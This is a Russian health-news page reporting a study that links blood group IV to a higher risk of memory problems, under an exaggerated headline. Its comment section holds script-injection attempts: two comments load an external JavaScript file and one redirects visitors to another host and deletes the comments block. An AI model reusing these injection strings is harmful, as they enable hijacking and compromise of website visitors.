Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Если у вас эта группа кро...  >>  Если у вас эта группа крови, вы сойдете с ума!
 
Обратная связь
 

Если у вас эта группа крови, вы сойдете с ума!

Размер шрифта
23 апреля 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Оказывается, от группы крови во многом зависит ваше здоровье. Ученые выяснили, что люди с четвертой группой крови наиболее подвержены нарушениям памяти в пожилом возрасте.

Если у вас эта группа крови, вы сойдете с ума!

Четвертая группа крови встречается не так уж часто: в среднем у одного из двадцати пяти человек. Команда ученых из Университета Вермонта за несколько лет проанализировала медицинские данные более чем 30 000 пациентов. И вот что они обнаружили: у людей с четвертой группой крови риск развития серьезных нарушений памяти и внимания был на 82% выше, чем у людей с другими группами крови. Эти результаты были опубликованы в журнале Neurology.

Хотя на сегодняшний день не удалось установить точную причину данной зависимости, существует несколько возможных гипотез. По словам ученых, каждая группа крови связана с определенными генами, а эти гены в свою очередь ответственны за формирование белков, участвующих в свертывании крови. Доктор Мэри Кушман, гематолог из Университета Вермонта и соавтор работы, объясняет, что от того, какие именно белки крови представлены в организме человека, может зависеть риск развития у него заболеваний сосудов. А так как мозгу для правильного функционирования необходимо хорошее кровоснабжение, заболевания сосудов и связанные с ними изменения кровотока могут привести к нарушениям работы мозга. Ученые также выяснили, что от группы крови в некоторой степени зависит риск развития заболеваний сердца, инсульта, тромбоза и даже некоторых типов рака.

Стоит ли переживать, если у вас четвертая группа крови? Пока нет, считает доктор Кушман. «Связь, которую мы обнаружили, довольно слаба и нуждается в дополнительном подтверждении», – отмечает она. И хотя риск развития проблем с памятью у таких людей на 82% выше, чем у всех остальных, общий риск развития подобных нарушений остается очень низким.

Хотите обладать отличной памятью в любом возрасте? Тогда следуйте рекомендациям врачей: ведите здоровый образ жизни, занимайтесь спортом и откажитесь от курения. Также очень важно поддерживать артериальное давление в пределах нормы. Ну и не забывайте и о тренировках для мозга: больше читайте, играйте в логические игры и будьте открыты для новых идей.

Узнайте все о том, как сохранить память, на страницах нашего одноименного спецпроекта.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - his shadow

23 апреля 2015 в 08:32

Цитировать   |   Пожаловаться

Похоже, у всей семейки Адамс именно эта группа крови, и проявляться её воздействие начало уже в довольно молодом возрасте.

2 - zzzzzz

30 июня 2015 в 18:22

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 21:19

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:13

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

5 - Гость

01 октября 2015 в 01:33

Цитировать   |   Пожаловаться

Переживайте все у кого не 1 группа. Я носитель крови проотца. А. вы - вырожденцы. Если я умру - и вы все сдохните, но вы сдохнете раньше.

Статьи

       
Какой рост у женщины, такими болезнями и болеет   Как избавиться от варикоза. Склеротерапия   Как Эйнштейн и Пугачева помогут поставить диагноз старческого слабоумия   Ученые победили старость: забытое лекарство возвращает память  
14 января 2013Ученые изобрели лекарство для лечения старческого слабоумия 30 апреля 2013Нужны ли бабушке социальные сети? Оказывается, они улучшат ее умственные способности!
 
01 марта 2013Почему пожилые люди так часто становятся жертвами мошенников 12 ноября 2012Старческие болезни больше не страшны
 

Слайдшоу

1
Игры, которые сделают вас гением!
Смертельные опасности для родителей зимой
А вы сойдете с ума в старости?

Тесты

1
Возраст мозга
Как быстро вы стареете
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.